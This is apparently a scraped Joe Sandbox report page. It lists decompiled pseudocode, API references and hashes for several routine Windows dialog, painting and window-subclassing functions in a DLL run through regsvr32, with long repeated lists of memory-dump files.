Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Menu$H_prologlstrlen$CountCurrentDecrementDeleteDirectoryInsertInterlockedItemStringwsprintf
String ID: &%d $\
API String ID: 3188129661-1982479665
Opcode ID: a0a6bc1cbe10ada8e5b25e421fb10eaeda350d98e05f8a36859abc3ebba9f7ca
Instruction ID: 128090b843164f7341132771b8ed1d19fe7ca88226a060b5ec4e71819375ed7e
Opcode Fuzzy Hash: a0a6bc1cbe10ada8e5b25e421fb10eaeda350d98e05f8a36859abc3ebba9f7ca
Instruction Fuzzy Hash: 5C71BF7490024AEFDB15CF64C884BAEBBF4FF09304F208569E55AD7292D731AA48CB64

Uniqueness

Uniqueness Score: -1.00%

Function 100412ED Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 175
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E100412ED(intOrPtr* __ecx) {
				intOrPtr _t81;
				intOrPtr _t91;
				struct HWND__* _t92;
				intOrPtr* _t143;
				intOrPtr* _t146;
				void* _t148;
				void* _t150;

				_t119 = __ecx;
				E1001A9E0(0x100764fc, _t148);
				_t146 = __ecx;
				 *((intOrPtr*)(_t148 - 0x10)) = _t150 - 0x34;
				 *((intOrPtr*)(_t148 - 0x24)) = __ecx;
				if( *(_t148 + 0x10) == 0) {
					 *(_t148 + 0x10) =  *(E10064B8B() + 8);
				}
				_t143 =  *((intOrPtr*)(E10064B8B() + 0x1038));
				 *((intOrPtr*)(_t148 - 0x28)) = _t143;
				 *(_t148 - 0x14) = 0;
				 *(_t148 - 0x18) = 0;
				 *(_t148 - 4) = 0;
				E10044C0F(_t119, 0x10);
				E10044C0F(_t119, 0x3c000);
				if(_t143 == 0) {
					L5:
					if( *(_t148 + 8) == 0) {
						L31:
						L33:
						 *[fs:0x0] =  *((intOrPtr*)(_t148 - 0xc));
						return 0;
					}
					_t81 =  *0x1008f630; // 0x1008f644
					 *((intOrPtr*)(_t148 - 0x1c)) = _t81;
					 *(_t148 - 4) = 1;
					 *((intOrPtr*)(_t148 - 0x20)) = 0;
					if((0 | E100471E2( *(_t148 + 8), _t148 - 0x1c, _t148 - 0x20) == 0x00000000) != 0) {
						L13:
						E10046F70(_t148 - 0x40,  *(_t148 + 8));
						 *(_t148 - 4) = 2;
						E10047399(_t148 - 0x40,  *((intOrPtr*)(_t148 - 0x20)));
						 *(_t148 - 0x14) = E100470A3(_t148 - 0x40);
						 *(_t148 - 4) = 1;
						E10047040(_t148 - 0x40);
						if( *(_t148 - 0x14) != 0) {
							 *(_t148 + 8) = GlobalLock( *(_t148 - 0x14));
						}
						L15:
						 *(_t146 + 0x2c) =  *(_t146 + 0x2c) | 0xffffffff;
						 *(_t146 + 0x24) =  *(_t146 + 0x24) | 0x00000010;
						_push(_t146);
						E1004242B();
						_t91 =  *((intOrPtr*)(_t148 + 0xc));
						if(_t91 != 0) {
							_t92 =  *(_t91 + 0x1c);
						} else {
							_t92 = 0;
						}
						 *(_t148 - 0x18) = CreateDialogIndirectParamA( *(_t148 + 0x10),  *(_t148 + 8), _t92, E10040FF8, 0);
						 *(_t148 - 4) = 0;
						E1004591E(_t148 - 0x1c);
						 *(_t148 - 4) =  *(_t148 - 4) | 0xffffffff;
						if(_t143 != 0) {
							 *((intOrPtr*)( *_t143 + 0x14))(_t148 - 0x34);
							if( *(_t148 - 0x18) != 0) {
								 *((intOrPtr*)( *_t146 + 0xb4))(0);
							}
						}
						if(E10042477() == 0) {
							 *((intOrPtr*)( *_t146 + 0xa4))();
						}
						if( *(_t148 - 0x18) != 0 && ( *(_t146 + 0x24) & 0x00000010) == 0) {
							DestroyWindow( *(_t148 - 0x18));
							 *(_t148 - 0x18) = 0;
						}
						if( *(_t148 - 0x14) != 0) {
							GlobalUnlock( *(_t148 - 0x14));
							GlobalFree( *(_t148 - 0x14));
						}
						if( *(_t148 - 0x18) != 0 || ( *(_t146 + 0x24) & 0x00000010) == 0) {
							_push(1);
							_pop(0);
							goto L33;
						} else {
							goto L31;
						}
					}
					if(GetSystemMetrics(0x2a) == 0 || E1001ABB8( *((intOrPtr*)(_t148 - 0x1c)), "MS Shell Dlg") != 0 && E1001ABB8( *((intOrPtr*)(_t148 - 0x1c)), "MS Sans Serif") != 0 && E1001ABB8( *((intOrPtr*)(_t148 - 0x1c)), ?str?) != 0) {
						goto L15;
					} else {
						if( *((short*)(_t148 - 0x20)) == 8) {
							 *((intOrPtr*)(_t148 - 0x20)) = 0;
						}
						goto L13;
					}
				}
				_push(_t148 - 0x34);
				if( *((intOrPtr*)( *_t146 + 0xb4))() == 0) {
					goto L31;
				}
				 *(_t148 + 8) =  *((intOrPtr*)( *_t143 + 0x10))(_t148 - 0x34,  *(_t148 + 8));
				goto L5;
			}

0x100412ed
0x100412f2
0x10041302
0x10041304
0x10041307
0x1004130a
0x10041314
0x10041314
0x1004131c
0x10041324
0x10041327
0x1004132a
0x1004132d
0x10041330
0x1004133a
0x10041341
0x1004136a
0x1004136d
0x10041502
0x10041509
0x1004150e
0x10041517
0x10041517
0x10041373
0x10041378
0x1004137e
0x10041387
0x100413a0
0x100413f5
0x100413fb
0x10041406
0x1004140a
0x1004141a
0x1004141d
0x10041421
0x10041429
0x10041434
0x10041434
0x10041437
0x10041437
0x1004143b
0x1004143f
0x10041440
0x10041445
0x1004144a
0x10041450
0x1004144c
0x1004144c
0x1004144c
0x10041469
0x1004146c
0x1004146f
0x10041493
0x10041499
0x100414a3
0x100414a9
0x100414b0
0x100414b0
0x100414a9
0x100414bd
0x100414c3
0x100414c3
0x100414cc
0x100414d7
0x100414dd
0x100414dd
0x100414e3
0x100414e8
0x100414f1
0x100414f1
0x100414fa
0x10041506
0x10041508
0x00000000
0x00000000
0x00000000
0x00000000
0x100414fa
0x100413ac
0x00000000
0x100413eb
0x100413f0
0x100413f2
0x100413f2
0x00000000
0x100413f0
0x100413ac
0x10041348
0x10041353
0x00000000
0x00000000
0x10041367
0x00000000

APIs

__EH_prolog.LIBCMT ref: 100412F2
GetSystemMetrics.USER32 ref: 100413A4
GlobalLock.KERNEL32 ref: 1004142E
CreateDialogIndirectParamA.USER32(?,?,?,Function_00040FF8,00000000), ref: 10041460

Part of subcall function 1004591E: InterlockedDecrement.KERNEL32(-000000F4), ref: 10045932

DestroyWindow.USER32 ref: 100414D7
GlobalUnlock.KERNEL32(?,?,?,00000000,?,?), ref: 100414E8
GlobalFree.KERNEL32(?), ref: 100414F1

Strings

MS Shell Dlg, xrefs: 100413B2
Helv, xrefs: 100413D8
MS Sans Serif, xrefs: 100413C5

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Global$CreateDecrementDestroyDialogFreeH_prologIndirectInterlockedLockMetricsParamSystemUnlockWindow
String ID: Helv$MS Sans Serif$MS Shell Dlg
API String ID: 2343056566-2894235370
Opcode ID: fccff6100110d967b49eddd0ad7e7b25dc1c16a6007c8677462ca15e3451ea3d
Instruction ID: af354e29afbfa9cb09bc380c7b97a5bebc8308a618248434b6df90a548a5c104
Opcode Fuzzy Hash: fccff6100110d967b49eddd0ad7e7b25dc1c16a6007c8677462ca15e3451ea3d
Instruction Fuzzy Hash: 5D616971A0024AEFCF05DFA4C985AEEBBF5FF08341F21443AE545E6291DB349A41CB99

Uniqueness

Uniqueness Score: -1.00%

Function 1002D2A0 Relevance: 16.7, APIs: 11, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1002D2A0(struct HWND__* _a4, int _a8, int _a12, long _a16, intOrPtr _a20) {
				struct tagRECT _v16;
				struct tagRECT _v36;
				int _t59;
				long _t72;
				intOrPtr* _t85;
				intOrPtr _t87;
				intOrPtr* _t94;
				struct HWND__* _t98;
				struct HWND__* _t99;
				int _t101;
				long _t102;

				_t101 = _a8;
				_t111 = _t101 - 0x82;
				if(_t101 != 0x82) {
					_t98 = _a4;
					__eflags = GetPropA(_t98, 0);
					if(__eflags == 0) {
						__eflags = _t101 - 0x18;
						if(__eflags > 0) {
							__eflags = _t101 - 0x83;
							if(__eflags > 0) {
								__eflags = _t101 - 0x1943;
								if(__eflags < 0) {
									goto L7;
								} else {
									__eflags = _t101 - 0x1944;
									if(__eflags <= 0) {
										 *_a16 = 1;
										return 0x3e9;
									} else {
										goto L7;
									}
								}
							} else {
								if(__eflags == 0) {
									__eflags =  *0x10096d40 - 0x30a;
									if(__eflags >= 0) {
										goto L7;
									} else {
										GetWindowRect(_t98,  &_v16);
										_t102 = CallWindowProcA(E1002A360(__eflags, _t98, _a20), _t98, _t101, _a12, _a16);
										_t94 = _a12;
										_t85 =  &_v36;
										 *_t85 =  *_t94;
										 *((intOrPtr*)(_t85 + 4)) =  *((intOrPtr*)(_t94 + 4));
										 *((intOrPtr*)(_t85 + 8)) =  *((intOrPtr*)(_t94 + 8));
										 *((intOrPtr*)(_t85 + 0xc)) =  *((intOrPtr*)(_t94 + 0xc));
										InflateRect( &_v36, 2, 1);
										_t87 = _v16.right;
										__eflags = _v36.bottom - _t87;
										if(_v36.bottom < _t87) {
											_t59 = _v36.bottom + 1;
											__eflags = _t59;
											_v36.top = _t59;
											_v36.bottom = _t87 + 1;
											_t99 = GetParent(_t98);
											ScreenToClient(_t99,  &_v36);
											ScreenToClient(_t99,  &(_v36.right));
											InvalidateRect(_t99,  &_v36, 1);
										}
										return _t102;
									}
								} else {
									__eflags = _t101 - 0x46;
									if(__eflags == 0) {
										__eflags =  *0x10096d40 - 0x30a;
										if(__eflags >= 0) {
											E1002C140(_t98, _a16);
										}
									}
									goto L7;
								}
							}
						} else {
							if(__eflags == 0) {
								__eflags =  *0x10096d40 - 0x30a;
								if(__eflags < 0) {
									__eflags = _a12;
									if(__eflags == 0) {
										E1002C140(_t98, 0);
									}
								}
								goto L7;
							} else {
								__eflags = _t101 - 0xf;
								if(__eflags == 0) {
									_t72 = CallWindowProcA(E1002A360(__eflags, _t98, _a20), _t98, _t101, _a12, _a16);
									E1002CDE0(_t98, 0, _a20);
									return _t72;
								} else {
									L7:
									return CallWindowProcA(E1002A360(__eflags, _t98, _a20), _t98, _t101, _a12, _a16);
								}
							}
						}
					} else {
						return CallWindowProcA(E1002A360(__eflags, _t98, _a20), _t98, _t101, _a12, _a16);
					}
				} else {
					return E1002A590(_t111, _a4, _t101, _a12, _a16, _a20);
				}
			}

0x1002d2a5
0x1002d2aa
0x1002d2b0
0x1002d2d8
0x1002d2ea
0x1002d2ec
0x1002d316
0x1002d319
0x1002d34e
0x1002d354
0x1002d363
0x1002d369
0x00000000
0x1002d36b
0x1002d36b
0x1002d371
0x1002d4bf
0x1002d4cd
0x1002d377
0x00000000
0x1002d377
0x1002d371
0x1002d356
0x1002d356
0x1002d3fd
0x1002d406
0x00000000
0x1002d40c
0x1002d412
0x1002d439
0x1002d43b
0x1002d43f
0x1002d44c
0x1002d451
0x1002d457
0x1002d45a
0x1002d462
0x1002d468
0x1002d46c
0x1002d470
0x1002d477
0x1002d477
0x1002d478
0x1002d47f
0x1002d489
0x1002d497
0x1002d49f
0x1002d4a9
0x1002d4a9
0x1002d4b7
0x1002d4b7
0x1002d35c
0x1002d35c
0x1002d35f
0x1002d3db
0x1002d3e4
0x1002d3f0
0x1002d3f5
0x1002d3e4
0x00000000
0x1002d35f
0x1002d356
0x1002d31b
0x1002d31b
0x1002d3b1
0x1002d3ba
0x1002d3c0
0x1002d3c5
0x1002d3ce
0x1002d3d3
0x1002d3c5
0x00000000
0x1002d321
0x1002d321
0x1002d324
0x1002d394
0x1002d3a0
0x1002d3b0
0x1002d326
0x1002d326
0x1002d34d
0x1002d34d
0x1002d324
0x1002d31b
0x1002d2ee
0x1002d315
0x1002d315
0x1002d2b2
0x1002d2d5
0x1002d2d5

APIs

GetPropA.USER32(?,00000000), ref: 1002D2E4
CallWindowProcA.USER32(00000000), ref: 1002D309

Part of subcall function 1002A590: CallWindowProcA.USER32(00000000,?,?,?,?), ref: 1002A5B6
Part of subcall function 1002A590: RemovePropA.USER32(?,00000000), ref: 1002A5CE
Part of subcall function 1002A590: RemovePropA.USER32(?,00000000), ref: 1002A5DA

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Prop$CallProcRemoveWindow
String ID:
API String ID: 2276450057-0
Opcode ID: 1ab8168d4da44d443828ed9f51cb36bc17a5eb9cc359b796ec1c5abd72af36df
Instruction ID: 3a262b44f14aad32601904f1b7725c990f505f939145587346293a368a589e84
Opcode Fuzzy Hash: 1ab8168d4da44d443828ed9f51cb36bc17a5eb9cc359b796ec1c5abd72af36df
Instruction Fuzzy Hash: 88519076A04210AFE214EB58ECC5DBFB7B8FBC9761F80441AF94983211E635AD4587A3

Uniqueness

Uniqueness Score: -1.00%

Function 1002D630 Relevance: 16.6, APIs: 11, Instructions: 140
windowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E1002D630(struct HWND__* _a4, struct HDC__* _a8) {
				struct tagRECT _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				void* _t26;
				struct HWND__* _t43;

				_t43 = _a4;
				_t26 = GetWindowLongA(_t43, 0xfffffff0);
				_v20 = _t26;
				if((_t26 & 0x10000000) == 0) {
					L15:
					return _t26;
				} else {
					GetClientRect(_t43,  &_v16);
					_t26 = _v20 & 0x0000001f;
					if(_t26 > 0x12) {
						goto L15;
					} else {
						switch( *((intOrPtr*)(0 +  &M1002D794))) {
							case 0:
								_t38 = SendMessageA(_t43, 0x31, 0, 0);
								if(_t38 == 0) {
									_t42 = _a8;
								} else {
									_t42 = _a8;
									_t38 = SelectObject(_t42, _t38);
								}
								SetBkMode(_t42, 2);
								_t45 = SendMessageA(GetParent(_t43), 0x138, _t42, _t43);
								_t51 = _t45;
								if(_t45 != 0) {
									_t45 = SelectObject(_t42, _t45);
								}
								_t26 = E1002D550(_t51, _t43, _t42,  &_v24, _v28);
								if(_t38 != 0) {
									_t26 = SelectObject(_t42, _t38);
								}
								if(_t45 == 0) {
									goto L15;
								} else {
									return SelectObject(_t42, _t45);
								}
								goto L16;
							case 1:
								__eax =  &_v16;
								_push(0xf);
								_push(0);
								return E1002A670(_a8,  &_v16, 2);
								goto L16;
							case 2:
								__eax =  &_v16;
								_push(0xf);
								_push(0);
								_v16.left = _v16.left + 1;
								_t20 =  &(_v16.top);
								 *_t20 = _v16.top + 1;
								__eflags =  *_t20;
								E1002A670(_a8,  &_v16, 0) = OffsetRect( &_v16, 0xffffffff, 0xffffffff);
								_push(0xf);
								_push(2);
								return E1002A670(_a8,  &_v16, 2);
								goto L16;
							case 3:
								__eax =  &_v16;
								_push(0xf);
								_push(2);
								return E1002A670(_a8,  &_v16, 0);
							case 4:
								goto L15;
						}
					}
				}
				L16:
			}

0x1002d635
0x1002d63e
0x1002d644
0x1002d64d
0x1002d793
0x1002d793
0x1002d653
0x1002d659
0x1002d663
0x1002d669
0x00000000
0x1002d66f
0x1002d677
0x00000000
0x1002d68d
0x1002d691
0x1002d6a3
0x1002d693
0x1002d693
0x1002d69f
0x1002d69f
0x1002d6aa
0x1002d6c1
0x1002d6c3
0x1002d6c5
0x1002d6cf
0x1002d6cf
0x1002d6dd
0x1002d6e7
0x1002d6eb
0x1002d6eb
0x1002d6f3
0x00000000
0x1002d6f9
0x1002d708
0x1002d708
0x00000000
0x00000000
0x1002d709
0x1002d70d
0x1002d713
0x1002d728
0x00000000
0x00000000
0x1002d729
0x1002d72d
0x1002d733
0x1002d735
0x1002d73b
0x1002d73b
0x1002d73b
0x1002d752
0x1002d75c
0x1002d75e
0x1002d773
0x00000000
0x00000000
0x1002d774
0x1002d778
0x1002d77e
0x00000000
0x00000000
0x00000000
0x00000000
0x1002d677
0x1002d669
0x00000000

APIs

GetWindowLongA.USER32(?,000000F0), ref: 1002D63E
GetClientRect.USER32 ref: 1002D659
SendMessageA.USER32 ref: 1002D68B
SelectObject.GDI32(?,00000000), ref: 1002D699
SetBkMode.GDI32(?,00000002), ref: 1002D6AA
GetParent.USER32(?), ref: 1002D6B8
SendMessageA.USER32 ref: 1002D6BF
SelectObject.GDI32(?,00000000), ref: 1002D6C9
SelectObject.GDI32(?,00000000), ref: 1002D6EB
SelectObject.GDI32(?,00000000), ref: 1002D6FB
OffsetRect.USER32 ref: 1002D752

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: ObjectSelect$MessageRectSend$ClientLongModeOffsetParentWindow
String ID:
API String ID: 3606012576-0
Opcode ID: 5eb90dd68c54b992a632178f1585bd4c18f8008b9d70c8c8a2b67183c158a4a9
Instruction ID: ff0c3fa32e0a8cb3a798e5abea77a773327a305686607fe1fa08b187c6542079
Opcode Fuzzy Hash: 5eb90dd68c54b992a632178f1585bd4c18f8008b9d70c8c8a2b67183c158a4a9
Instruction Fuzzy Hash: F8412E732043157BE200BB58AC8AF7F736CFBC5724F85012AFA0596182EB65ED0587B2

Uniqueness

Uniqueness Score: -1.00%

Function 1002ACC1 Relevance: 16.6, APIs: 11, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1002ACC1(void* __eax, void* __ebx, void* __edx, struct HWND__* _a12) {
				long _t9;
				struct HWND__* _t15;
				struct HWND__* _t21;
				struct HWND__* _t24;
				long _t25;
				long _t30;
				void* _t37;
				signed int _t40;
				struct HWND__* _t45;
				struct HWND__* _t49;
				void* _t58;

				_t1 = __ebx + 0x56;
				 *_t1 =  *((intOrPtr*)(__ebx + 0x56)) + __edx;
				if( *_t1 != 0) {
					_t49 = _a12;
					_t9 = GetWindowLongA(_t49, 0xfffffffc);
					_t40 = 0;
					__eflags = 0;
					_t37 = RemovePropA;
					do {
						_t42 = _t40 + _t40 * 2;
						__eflags =  *((intOrPtr*)(0x10097780 + (_t40 + _t40 * 2) * 8)) - _t9;
						if(__eflags == 0) {
							_t30 = E1002A360(__eflags, _t49, _t40);
							_t58 = _t58 + 8;
							RemovePropA(_t49, 0);
							SetWindowLongA(_t49, 0xfffffffc, _t30);
							_t9 = 0;
							__eflags = 0;
							_t40 = 0x10;
						}
						_t40 = 1 + _t40;
						__eflags = _t40 - 6;
					} while (__eflags < 0);
					if(__eflags == 0) {
						__eflags = _t9 - E1002B900;
						if(__eflags != 0) {
							_t15 = GetPropA(_t49, 0);
							__eflags = _t15;
							if(_t15 != 0) {
								L12:
								__eflags = 0;
								SetPropA(_t49, 0, 1);
							} else {
								_t21 = GetPropA(_t49, 0);
								__eflags = _t21;
								if(_t21 != 0) {
									goto L12;
								} else {
									_t24 = GetPropA(_t49, 0);
									__eflags = _t24;
									if(_t24 != 0) {
										goto L12;
									}
								}
							}
						} else {
							_t25 = E1002A360(__eflags, _t49, _t40);
							RemovePropA(_t49, 0);
							SetWindowLongA(_t49, 0xfffffffc, _t25);
						}
					}
					_t45 = GetWindow(_t49, 5);
					__eflags = _t45;
					while(_t45 != 0) {
						E1002ACC0(_t10, _t37, _t42, _t45);
						_t45 = GetWindow(_t45, 2);
						__eflags = _t45;
					}
					return 1;
				} else {
					return 0;
				}
			}

0x1002acc6
0x1002acc6
0x1002accb
0x1002acd6
0x1002acdd
0x1002ace3
0x1002ace3
0x1002aceb
0x1002acf1
0x1002acf1
0x1002acf4
0x1002acfb
0x1002acff
0x1002ad04
0x1002ad13
0x1002ad19
0x1002ad1b
0x1002ad1b
0x1002ad1d
0x1002ad1d
0x1002ad22
0x1002ad23
0x1002ad23
0x1002ad28
0x1002ad2a
0x1002ad2f
0x1002ad61
0x1002ad63
0x1002ad65
0x1002ad87
0x1002ad89
0x1002ad93
0x1002ad67
0x1002ad71
0x1002ad73
0x1002ad75
0x00000000
0x1002ad77
0x1002ad81
0x1002ad83
0x1002ad85
0x00000000
0x00000000
0x1002ad85
0x1002ad75
0x1002ad31
0x1002ad33
0x1002ad47
0x1002ad4d
0x1002ad4d
0x1002ad2f
0x1002ada4
0x1002ada6
0x1002ada8
0x1002adab
0x1002adb5
0x1002adb7
0x1002adb7
0x1002adc4
0x1002accd
0x1002acd3
0x1002acd3

APIs

GetWindowLongA.USER32(?,000000FC), ref: 1002ACDD
RemovePropA.USER32(?,00000000), ref: 1002AD13
SetWindowLongA.USER32(?,000000FC,00000000), ref: 1002AD19
RemovePropA.USER32(?,00000000), ref: 1002AD47
SetWindowLongA.USER32(?,000000FC,00000000), ref: 1002AD4D
GetWindow.USER32(?,00000005), ref: 1002ADA2
GetWindow.USER32(00000000,00000002), ref: 1002ADB3

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
